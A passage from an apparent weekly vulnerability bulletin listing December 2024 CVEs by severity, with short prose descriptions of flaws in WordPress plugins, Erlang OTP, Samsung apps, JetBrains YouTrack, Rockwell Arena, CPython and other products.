OTP is a set of Erlang libraries, which consists of the Erlang runtime system, a number of ready-to-use components mainly written in Erlang, and a set of design principles for Erlang programs. A regression was introduced into the ssl application of OTP starting at OTP-25.3.2.8, OTP-26.2, and OTP-27.0, resulting in a server or client verifying the peer when incorrect extended key usage is presented (i.e., a server will verify a client if they have server auth ext key usage and vice versa). | 2024-12-05 | 5.5 | CVE-2024-53846 |
| kanboard--kanboard |
Kanboard is project management software that focuses on the Kanban methodology. HTML can be injected and stored into the application settings section. The fields application_language, application_date_format,application_timezone and application_time_format allow arbirary user input which is reflected. The vulnerability can become xss if the user input is javascript code that bypass CSP. This vulnerability is fixed in 1.2.41. | 2024-12-05 | 5.5 | CVE-2024-54001 |
| DependencyTrack--dependency-track |
Dependency-Track is a Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain. Performing a login request against the /api/v1/user/login endpoint with a username that exist in the system takes significantly longer than performing the same action with a username that is not known by the system. The observable difference in request duration can be leveraged by actors to enumerate valid names of managed users. LDAP and OpenID Connect users are not affected. The issue has been fixed in Dependency-Track 4.12.2. | 2024-12-04 | 5.3 | CVE-2024-54002 |
| directus--directus |
Directus is a real-time API and App dashboard for managing SQL database content. The Comment feature has implemented a filter to prevent users from adding restricted characters, such as HTML tags. However, this filter operates on the client-side, which can be bypassed, making the application vulnerable to HTML Injection. This vulerability is fixed in 10.13.4 and 11.2.0. | 2024-12-05 | 5.7 | CVE-2024-54128 |
| URBAN BASE--Z-Downloads |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in URBAN BASE Z-Downloads allows Stored XSS.This issue affects Z-Downloads: from n/a through 1.11.7. | 2024-12-06 | 5.9 | CVE-2024-54206 |
| Owen Cutajar & Hyder Jaffari--WordPress Auction Plugin |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Owen Cutajar & Hyder Jaffari WordPress Auction Plugin allows Stored XSS.This issue affects WordPress Auction Plugin: from n/a through 3.7. | 2024-12-06 | 5.9 | CVE-2024-54207 |
| Visualmodo--Borderless |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Visualmodo Borderless allows Cross-Site Scripting (XSS).This issue affects Borderless: from n/a through 1.5.8. | 2024-12-06 | 5.9 | CVE-2024-54211 |
| RestApp Inc.--Online Ordering System |
Improper Input Validation vulnerability in RestApp Inc. Online Ordering System allows Integer Attacks.This issue affects Online Ordering System: 8.2.1. NOTE: Vulnerability fixed in version 8.2.2 and does not exist before 8.2.1. | 2024-12-04 | 5.3 | CVE-2024-7488 |
| andreiigna--If Menu Visibility control for Menus |
The If Menu plugin for WordPress is vulnerable to unauthorized modification of the plugin's license key due to a missing capability check on the 'actions' function in versions up to, and including, 0.19.1. This makes it possible for unauthenticated attackers to modify delete or modify the license key. | 2024-12-07 | 5.3 | CVE-2024-7894 |
| Moxa--VPort 07-3 Series |
Moxa's IP Cameras are affected by a medium-severity vulnerability, CVE-2024-9404, which could lead to a denial-of-service condition or cause a service crash. This vulnerability allows attackers to exploit the Moxa service, commonly referred to as moxa_cmd, originally designed for deployment. Because of insufficient input validation, this service may be manipulated to trigger a denial-of-service. This vulnerability poses a significant remote threat if the affected products are exposed to publicly accessible networks. Attackers could potentially disrupt operations by shutting down the affected systems. Due to the critical nature of this security risk, we strongly recommend taking immediate action to prevent potential exploitation. | 2024-12-04 | 5.3 | CVE-2024-9404 |
| rstheme2017--Ultimate Coming Soon & Maintenance |
The Ultimate Coming Soon & Maintenance plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ucsm_activate_lite_template_lite function in all versions up to, and including, 1.0.9. This makes it possible for unauthenticated attackers to change the template used for the coming soon / maintenance page. | 2024-12-06 | 5.3 | CVE-2024-9706 |
| sasonikolov--Event Tickets with Ticket Scanner |
The Event Tickets with Ticket Scanner plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data' parameters in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping and missing authorization on the functionality to manage tickets. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This missing authorization aspect of this was patched in 2.4.1, while the Cross-Site Scripting was fully patched in 2.4.4. | 2024-12-06 | 5.4 | CVE-2024-9866 |
| vcita--Online Booking & Scheduling Calendar for WordPress by vcita |
The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_save_user_data_callback() function in all versions up to, and including, 4.5.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject malicious web scripts and update settings. | 2024-12-06 | 5.4 | CVE-2024-9872 |
| OpenHarmony--OpenHarmony |
in OpenHarmony v4.1.1 and prior versions allow a local attacker cause information leak through out-of-bounds Read. | 2024-12-03 | 5.5 | CVE-2024-9978 |
| Synology--Surveillance Station |
Incorrect authorization vulnerability in Alert.Setting webapi component in Synology Surveillance Station before 9.2.0-11289 and 9.2.0-9289 allows remote authenticated users to to perform limited actions on the alerting function via unspecified vectors. | 2024-12-04 | 4.3 | CVE-2023-52943 |
| Synology--Surveillance Station |
Incorrect authorization vulnerability in ActionRule webapi component in Synology Surveillance Station before 9.2.0-11289 and 9.2.0-9289 allows remote authenticated users to perform limited actions on the set action rules function via unspecified vectors. | 2024-12-04 | 4.3 | CVE-2023-52944 |
| NVIDIA--Base Command Manager |
NVIDIA Base Command Manager and Bright Cluster Manager for Linux contain an insecure temporary file vulnerability. A successful exploit of this vulnerability might lead to denial of service. | 2024-12-06 | 4.4 | CVE-2024-0139 |
| Unknown--3DPrint Lite |
The 3DPrint Lite WordPress plugin before 2.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack. | 2024-12-06 | 4.3 | CVE-2024-10480 |
| Unknown--Sticky Social Icons |
The Sticky Social Icons WordPress plugin through 1.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-06 | 4.8 | CVE-2024-10551 |
| smarettheme--Eleblog Elementor Blog And Magazine Addons |
The Eleblog - Elementor Blog And Magazine Addons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the goodbye_form_callback() function in all versions up to, and including, 1.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to submit a deactivation reason. | 2024-12-04 | 4.3 | CVE-2024-10663 |
| codesavory--Knowledge Base documentation & wiki plugin BasePress Docs |
The Knowledge Base documentation & wiki plugin - BasePress Docs plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the basepress_db_posts_update() function in all versions up to, and including, 2.16.3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the database. | 2024-12-04 | 4.3 | CVE-2024-10664 |
| webangon--XLTab Accordions and Tabs for Elementor Page Builder |
The XLTab - Accordions and Tabs for Elementor Page Builder plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4 via the 'XLTAB_INSERT_TPL' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to. | 2024-12-06 | 4.3 | CVE-2024-10689 |
| ideaboxcreations--PowerPack Elementor Addons (Free Widgets, Extensions and Templates) |
The PowerPack Elementor Addons (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.8.1 via the Content Reveal widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to. | 2024-12-06 | 4.3 | CVE-2024-10692 |
| wpvibes--AnyWhere Elementor |
The AnyWhere Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.11 via the 'INSERT_ELEMENTOR' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to. | 2024-12-05 | 4.3 | CVE-2024-10777 |
| choijun--LA-Studio Element Kit for Elementor |
The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.4 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private and draft posts created by Elementor that they should not have access to. | 2024-12-04 | 4.3 | CVE-2024-10787 |
| Unknown--WP Booking Calendar |
The WP Booking Calendar WordPress plugin before 10.6.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-03 | 4.8 | CVE-2024-10893 |
| ecolosites--Simple Redirection |
The Simple Redirection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the settings_page() function. This makes it possible for unauthenticated attackers to update the plugin's settings and redirect all site visitors via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-05 | 4.3 | CVE-2024-11341 |
| clicksend--SMS for Lead Capture Forms |
The SMS for Lead Capture Forms plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_message() function in all versions up to, and including, 1.1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary messages. | 2024-12-07 | 4.3 | CVE-2024-11353 |
| cluevo--CLUEVO LMS, E-Learning Platform |
The CLUEVO LMS, E-Learning Platform plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.13.2. This is due to missing or incorrect nonce validation on the cluevo_render_module_ui() function. This makes it possible for unauthenticated attackers to delete modules via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-06 | 4.3 | CVE-2024-11444 |
| northernbeacheswebsites--IdeaPush |
The IdeaPush plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the idea_push_taxonomy_save_routine function in all versions up to, and including, 8.71. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete terms for the "boards" taxonomy. | 2024-12-03 | 4.3 | CVE-2024-11844 |
| ASUS--RT-AX55 |
An improper input validation vulnerability leads to device crashes in certain ASUS router models. Refer to the '12/03/2024 ASUS Router Improper Input Validation' section on the ASUS Security Advisory for more information. | 2024-12-04 | 4.4 | CVE-2024-11985 |
| kofimokome--Message Filter for Contact Form 7 |
The Message Filter for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the saveFilter() function in all versions up to, and including, 1.6.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new filters. | 2024-12-07 | 4.3 | CVE-2024-12026 |
| kofimokome--Message Filter for Contact Form 7 |
The Message Filter for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the updateFilter() and deleteFilter() functions in all versions up to, and including, 1.6.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to update and delete filters. | 2024-12-06 | 4.3 | CVE-2024-12027 |
| nicheaddons--Charity Addon for Elementor |
The Charity Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.3.2 via the 'nacharity_elementor_template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to. | 2024-12-03 | 4.3 | CVE-2024-12062 |
| getdollie--Dollie Hub Build Your Own WordPress Cloud Platform |
The Dollie Hub - Build Your Own WordPress Cloud Platform plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 6.2.0 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to. | 2024-12-04 | 4.3 | CVE-2024-12099 |
| jerryscg--Gold Addons for Elementor |
The Gold Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the activate() and deactivate() functions in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate and deactivate licenses. | 2024-12-06 | 4.3 | CVE-2024-12110 |
| ays-pro--Poll Maker Versus Polls, Anonymous Polls, Image Polls |
The Poll Maker - Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.5.4. This is due to missing or incorrect nonce validation on the duplicate_poll() function. This makes it possible for unauthenticated attackers to duplicate polls via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-07 | 4.3 | CVE-2024-12115 |
| Devolutions--Server |
Incorrect authorization in permission validation component in Devolutions Server 2024.3.6.0 and earlier allows an authenticated user to access some reporting endpoints. | 2024-12-04 | 4.3 | CVE-2024-12148 |
| Mattermost--Mattermost |
Mattermost versions 9.7.x <= 9.7.5, 9.8.x <= 9.8.2 and 9.9.x <= 9.9.2 fail to properly propagate permission scheme updates across cluster nodes which allows a user to keep old permissions, even if the permission scheme has been updated. | 2024-12-05 | 4.6 | CVE-2024-12247 |
| MediaTek, Inc.--MT6765, MT6768, MT6779, MT6781, MT6785, MT6789, MT8765, MT8766, MT8768, MT8771, MT8781, MT8786, MT8788, MT8789, MT8791T, MT8795T, MT8797, MT8798 |
In cmdq, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09057438; Issue ID: MSV-1696. | 2024-12-02 | 4.4 | CVE-2024-20116 |
| IBM--Cognos Controller |
IBM Cognos Controller 11.0.0 and 11.0.1 could allow an authenticated user with local access to bypass security allowing users to circumvent restrictions imposed on input fields. | 2024-12-03 | 4.3 | CVE-2024-25036 |
| Spring by VMware Tanzu--Spring Security |
The usage of String.toLowerCase() and String.toUpperCase() has some Locale dependent exceptions that could potentially result in authorization rules not working properly. | 2024-12-02 | 4.8 | CVE-2024-38827 |
| IBM--Cognos Controller |
IBM Cognos Controller 11.0.0 and 11.0.1 could allow an authenticated user to upload insecure files, due to insufficient file type distinction. | 2024-12-03 | 4.3 | CVE-2024-45676 |
| Microsoft--Microsoft Edge (Chromium-based) |
Microsoft Edge (Chromium-based) Spoofing Vulnerability | 2024-12-06 | 4.3 | CVE-2024-49041 |
| Samsung Mobile--Samsung Mobile Devices |
Path Traversal in ThemeCenter prior to SMR Dec-2024 Release 1 allows physical attackers to copy apk files to arbitrary path with ThemeCenter privilege. | 2024-12-03 | 4.3 | CVE-2024-49411 |
| Samsung Mobile--SmartThings |
Use of implicit intent for sensitive communication in SmartThings prior to version 1.8.21 allows local attackers to get sensitive information. | 2024-12-03 | 4 | CVE-2024-49416 |
| Samsung Mobile--GamingHub |
Insufficient verification of url authenticity in GamingHub prior to version 6.1.03.4 in Korea, 7.1.02.4 in Global allows remote attackers to load an arbitrary URL in its webview. | 2024-12-03 | 4.3 | CVE-2024-49419 |
| Samsung Mobile--Quick Share Agent |
Path traversal in Quick Share Agent prior to version 3.5.14.47 in Android 12, 3.5.19.41 in Android 13, and 3.5.19.42 in Android 14 allows adjacent attackers to write file in arbitrary location. | 2024-12-03 | 4.3 | CVE-2024-49421 |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking ClearPass Policy Manager |
A vulnerability in the HPE Aruba Networking ClearPass Policy Manager web-based management interface could allow an authenticated remote Attacker to conduct a stored cross-site scripting (XSS) attack. Successful exploitation could enable a threat actor to perform any actions the user is authorized to do, including accessing the user's data and altering information within the user's permissions. This could lead to data modification, deletion, or theft, including unauthorized access to files, file deletion, or the theft of session cookies, which an attacker could use to hijack a user's session. | 2024-12-03 | 4.8 | CVE-2024-51773 |
| Ben Marshall--Jobify - Job Board WordPress Theme |
Cross-Site Request Forgery (CSRF) vulnerability in Ben Marshall Jobify - Job Board WordPress Theme allows Cross Site Request Forgery.This issue affects Jobify - Job Board WordPress Theme: from n/a through 4.2.3. | 2024-12-02 | 4.3 | CVE-2024-52479 |
| vitessio--vitess |
Vitess is a database clustering system for horizontal scaling of MySQL. The /debug/querylogz and /debug/env pages for vtgate and vttablet do not properly escape user input. The result is that queries executed by Vitess can write HTML into the monitoring page at will. These pages are rendered using text/template instead of rendering with a proper HTML templating engine. This vulnerability is fixed in 21.0.1, 20.0.4, and 19.0.8. | 2024-12-03 | 4.9 | CVE-2024-53257 |
| n/a--n/a |
A Cross Site Scripting vulnerability in LibrePhotos before commit 32237 allows attackers to takeover any account via uploading an HTML file on behalf of the admin user using IDOR in file upload. | 2024-12-02 | 4.8 | CVE-2024-53617 |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking ClearPass Policy Manager |
A vulnerability in the ClearPass Policy Manager web-based management interface allows remote authenticated users to run arbitrary commands on the underlying host. Successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system. | 2024-12-03 | 4.7 | CVE-2024-53672 |
| Ahmet mamolu--Ahmeti Wp Gzel Szler |
Cross-Site Request Forgery (CSRF) vulnerability in Ahmet İmamoğlu Ahmeti Wp Güzel Sözler allows Cross Site Request Forgery.This issue affects Ahmeti Wp Güzel Sözler: from n/a through 4.0. | 2024-12-02 | 4.3 | CVE-2024-53707 |
| TannerRitchie Web Applications/DancePress--DancePress (TRWA) |
Cross-Site Request Forgery (CSRF) vulnerability in TannerRitchie Web Applications/DancePress DancePress (TRWA) allows Cross Site Request Forgery.This issue affects DancePress (TRWA): from n/a through 3.1.11. | 2024-12-02 | 4.3 | CVE-2024-53775 |
| E-goi--Smart Marketing SMS and Newsletters Forms |
Missing Authorization vulnerability in E-goi Smart Marketing SMS and Newsletters Forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Smart Marketing SMS and Newsletters Forms: from n/a through 5.0.9. | 2024-12-02 | 4.3 | CVE-2024-53784 |
| BAKKBONE Australia--FloristPress |
Missing Authorization vulnerability in BAKKBONE Australia FloristPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FloristPress: from n/a through 7.3.0. | 2024-12-06 | 4.3 | CVE-2024-53799 |
| Kiboko Labs--Namaste! LMS |
Cross-Site Request Forgery (CSRF) vulnerability in Kiboko Labs Namaste! LMS allows Cross Site Request Forgery.This issue affects Namaste! LMS: from n/a through 2.6.4.1. | 2024-12-06 | 4.3 | CVE-2024-53809 |
| Ninja Team--Filebird |
Missing Authorization vulnerability in Ninja Team Filebird allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Filebird: from n/a through 6.3.2. | 2024-12-06 | 4.7 | CVE-2024-53825 |
| element-hq--synapse |
Synapse is an open-source Matrix homeserver. The Sliding Sync feature on Synapse versions between 1.113.0rc1 and 1.120.0 can leak partial room state changes to users no longer in a room. Non-state events, like messages, are unaffected. This vulnerability is fixed in 1.120.1. | 2024-12-03 | 4.3 | CVE-2024-53867 |
| nanopb--nanopb |
Nanopb is a small code-size Protocol Buffers implementation. When the compile time option PB_ENABLE_MALLOC is enabled, the message contains at least one field with FT_POINTER field type, custom stream callback is used with unknown stream length. and the pb_decode_ex() function is used with flag PB_DECODE_DELIMITED, then the pb_decode_ex() function does not automatically call pb_release(), like is done for other failure cases. This could lead to memory leak and potential denial-of-service. This vulnerability is fixed in 0.4.9.1. | 2024-12-02 | 4.3 | CVE-2024-53984 |
| JetBrains--YouTrack |
In JetBrains YouTrack before 2024.3.52635 multiple merge functions were vulnerable to prototype pollution attack | 2024-12-04 | 4.2 | CVE-2024-54156 |
| JetBrains--YouTrack |
In JetBrains YouTrack before 2024.3.52635 potential ReDoS was possible due to vulnerable RegExp in Ruby syntax detector | 2024-12-04 | 4.3 | CVE-2024-54157 |
| n/a--n/a |
CyberPanel (aka Cyber Panel) before 6778ad1 does not require the FilemanagerAdmin capability for restartMySQL actions. | 2024-12-05 | 4.3 | CVE-2024-54679 |
| ServiceNow--Now Platform |
ServiceNow has addressed an HTML injection vulnerability that was identified in the Now Platform. This vulnerability could potentially enable an unauthenticated user to modify a web page or redirect users to another website. ServiceNow released updates to customers that addressed this vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance(s) as soon as possible. | 2024-12-02 | 4.3 | CVE-2024-5890 |
| Zyxel--VMG3625-T50B firmware |
A post-authentication buffer overflow vulnerability in the parameter "action" of the CGI program in Zyxel VMG3625-T50B firmware versions through V5.50(ABPM.9.2)C0 could allow an authenticated attacker with administrator privileges to cause a temporary denial of service (DoS) condition against the web management interface by sending a crafted HTTP GET request to a vulnerable device if the function ZyEE is enabled. | 2024-12-03 | 4.9 | CVE-2024-9197 |
| rstheme2017--Ultimate Coming Soon & Maintenance |
The Ultimate Coming Soon & Maintenance plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ucsm_update_template_name_lite' function in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the name of the plugin's templates. | 2024-12-06 | 4.3 | CVE-2024-9705 |
| totalsoft--Video Gallery YouTube Gallery and Vimeo Gallery |
The Video Gallery - Best WordPress YouTube Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2024-12-06 | 4.4 | CVE-2024-9769 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| Hewlett Packard Enterprise--HPE IceWall |
A security vulnerability in HPE IceWall products could be exploited remotely to cause Unauthorized Data Modification. | 2024-12-02 | 3.7 | CVE-2024-11856 |
| n/a--DedeCMS |
A vulnerability classified as problematic has been found in DedeCMS 5.7.116. Affected is an unknown function of the file /member/article_add.php. The manipulation of the argument body leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-04 | 3.5 | CVE-2024-12180 |
| n/a--DedeCMS |
A vulnerability classified as problematic was found in DedeCMS 5.7.116. Affected by this vulnerability is an unknown functionality of the file /member/uploads_add.php of the component SWF File Handler. The manipulation of the argument mediatype leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-04 | 3.5 | CVE-2024-12181 |
| n/a--DedeCMS |
A vulnerability, which was classified as problematic, has been found in DedeCMS 5.7.116. Affected by this issue is some unknown functionality of the file /member/soft_add.php. The manipulation of the argument body leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-04 | 3.5 | CVE-2024-12182 |
| n/a--DedeCMS |
A vulnerability, which was classified as problematic, was found in DedeCMS 5.7.116. This affects the function RemoveXSS of the file /plus/carbuyaction.php of the component HTTP POST Request Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-04 | 3.5 | CVE-2024-12183 |
| code-projects--Simple CRUD Functionality |
A vulnerability has been found in code-projects Simple CRUD Functionality 1.0 and classified as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument newtitle/newdescr leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-12-05 | 3.5 | CVE-2024-12232 |
| VMware Tanzu--Spring LDAP |
A vulnerability in VMware Tanzu Spring LDAP allows data exposure for case sensitive comparisons.This issue affects Spring LDAP: from 2.4.0 through 2.4.3, from 3.0.0 through 3.0.9, from 3.1.0 through 3.1.7, from 3.2.0 through 3.2.7, AND all versions prior to 2.4.0. The usage of String.toLowerCase() and String.toUpperCase() has some Locale dependent exceptions that could potentially result in unintended columns from being queried Related to CVE-2024-38820 https://spring.io/security/cve-2024-38820 | 2024-12-04 | 3.7 | CVE-2024-38829 |
| HCL Software--DevOps Deploy / Launch |
HCL DevOps Deploy / HCL Launch is vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure. | 2024-12-05 | 3.1 | CVE-2024-42195 |
| n/a--n/a |
Seecms v4.8 was discovered to contain a SQL injection vulnerability in the SEMCMS_SeoAndTag.php page. | 2024-12-03 | 3.8 | CVE-2024-53502 |
| JetBrains--YouTrack |
In JetBrains YouTrack before 2024.3.51866 unauthenticated database backup download was possible via vulnerable query parameter | 2024-12-04 | 3.1 | CVE-2024-54153 |
| JetBrains--YouTrack |
In JetBrains YouTrack before 2024.3.51866 improper access control allowed listing of project names during app import without authentication | 2024-12-04 | 3.7 | CVE-2024-54155 |
| JetBrains--YouTrack |
In JetBrains YouTrack before 2024.3.52635 potential spoofing attack was possible via lack of Punycode encoding | 2024-12-04 | 3.5 | CVE-2024-54158 |
| Canonical Ltd.--LXD |
Mark Laing discovered that LXD's PKI mode, until version 5.21.2, could be bypassed if the client's certificate was present in the trust store. | 2024-12-06 | 3.8 | CVE-2024-6156 |
| Canonical Ltd.--LXD |
Mark Laing discovered in LXD's PKI mode, until version 5.21.1, that a restricted certificate could be added to the trust store with its restrictions not honoured. | 2024-12-06 | 3.8 | CVE-2024-6219 |
| Samsung Mobile--Samsung Mobile Devices |
Authentication Bypass Using an Alternate Path in Dex Mode prior to SMR Dec-2024 Release 1 allows physical attackers to temporarily access to recent app list. | 2024-12-03 | 2.4 | CVE-2024-49414 |
| Samsung Mobile--Smart Touch Call |
Use of implicit intent for sensitive communication in Smart Touch Call prior to 1.0.0.8 allows local attackers to launch privileged activities. User interaction is required for triggering this vulnerability. | 2024-12-03 | 2 | CVE-2024-49417 |
| n/a--n/a |
An issue was discovered in the installer in Samsung Magician 8.1.0 on Windows. An attacker can create arbitrary folders in the system permission directory via a symbolic link during the installation process. | 2024-12-03 | 2.8 | CVE-2024-53921 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| Google--Android |
In sg_remove_scat of scsi/sg.c, there is a possible memory corruption due to an unusual root cause. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. | 2024-12-05 | not yet calculated | CVE-2018-9416 |
| n/a--n/a |
STMicroelectronics SPC58 is vulnerable to Missing Protection Mechanism for Alternate Hardware Interface. Code running as Supervisor on the SPC58 PowerPC microcontrollers may disable the System Memory Protection Unit and gain unabridged read/write access to protected assets. | 2024-12-05 | not yet calculated | CVE-2023-48010 |
| n/a--n/a |
Oxide control plane software before 5 allows SSRF. | 2024-12-05 | not yet calculated | CVE-2023-50913 |
| B&R Industrial Automation GmbH--B&R mapp Cockpit |
An "Authentication Bypass Using an Alternate Path or Channel" vulnerability in the OPC UA Server configuration required for B&R mapp Cockpit before 6.0, B&R mapp View before 6.0, B&R mapp Services before 6.0, B&R mapp Motion before 6.0 and B&R mapp Vision before 6.0 may be used by an unauthenticated network-based attacker to cause information disclosure, unintended change of data, or denial of service conditions. B&R mapp Services is only affected, when mpUserX or mpCodeBox are used in the Automation Studio project. | 2024-12-02 | not yet calculated | CVE-2024-10490 |
| Infinix Mobile--com.transsion.agingfunction |
Infinix devices contain a pre-loaded "com.transsion.agingfunction" application, that exposes an unsecured broadcast receiver. An attacker can communicate with the receiver and force the device to perform a factory reset without any Android system permissions. After multiple attempts to contact the vendor we did not receive any answer. We suppose this issue affects all Infinix Mobile devices. | 2024-12-04 | not yet calculated | CVE-2024-10576 |
| Rockwell Automation--Arena |
An "out of bounds write" code execution vulnerability exists in the Rockwell Automation Arena® that could allow a threat actor to write beyond the boundaries of allocated memory in a DOE file. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor. | 2024-12-05 | not yet calculated | CVE-2024-11156 |
| Unknown--Simple Side Tab |
The Simple Side Tab WordPress plugin before 2.2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-12-07 | not yet calculated | CVE-2024-11183 |
| Issuetrak--Issuetrak |
A HTML Injection vulnerability was identified in Issuetrak version 17.1 that could be triggered by an authenticated user. HTML markup could be added to comments of tickets, which when submitted will render in the emails sent to all users on that ticket. | 2024-12-04 | not yet calculated | CVE-2024-11479 |
| arcinfo--PcVue |
The Client secret is not checked when using the OAuth Password grant type. By exploiting this vulnerability, an attacker could connect to a web server using a client application not explicitly authorized as part of the OAuth deployment. Exploitation requires valid credentials and does not permit the attacker to bypass user privileges. | 2024-12-04 | not yet calculated | CVE-2024-12056 |
| Mogify Infotech--Tinxy |
This vulnerability exists in the Tinxy mobile app due to storage of logged-in user information in plaintext on the device database. An attacker with physical access to the rooted device could exploit this vulnerability by accessing its database leading to unauthorized access of user information such as username, email address and mobile number. | 2024-12-05 | not yet calculated | CVE-2024-12094 |
| Issuetrak--Issuetrak |
A hidden field manipulation vulnerability was identified in Issuetrak version 17.1 that could be triggered by an authenticated user. When an authenticated user submits a ticket, the request can be intercepted and subsequently modified by using a proxy. The ticket requester can be changed from the original requester to another user in the same application, which the application then accepts. | 2024-12-04 | not yet calculated | CVE-2024-12123 |
| Rockwell Automation--Arena |
An "out of bounds read" code execution vulnerability exists in the Rockwell Automation Arena® that could allow a threat actor to craft a DOE file and force the software to read beyond the boundaries of an allocated memory. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor. | 2024-12-05 | not yet calculated | CVE-2024-12130 |
| Python Software Foundation--CPython |
Starting in Python 3.12.0, the asyncio._SelectorSocketTransport.writelines() method would not "pause" writing and signal to the Protocol to drain the buffer to the wire once the write buffer reached the "high-water mark". Because of this, Protocols would not periodically drain the write buffer potentially leading to memory exhaustion. This vulnerability likely impacts a small number of users, you must be using Python 3.12.0 or later, on macOS or Linux, using the asyncio module with protocols, and using .writelines() method which had new zero-copy-on-write behavior in Python 3.12.0 and later. If not all of these factors are true then your usage of Python is unaffected. | 2024-12-06 | not yet calculated | CVE-2024-12254 |
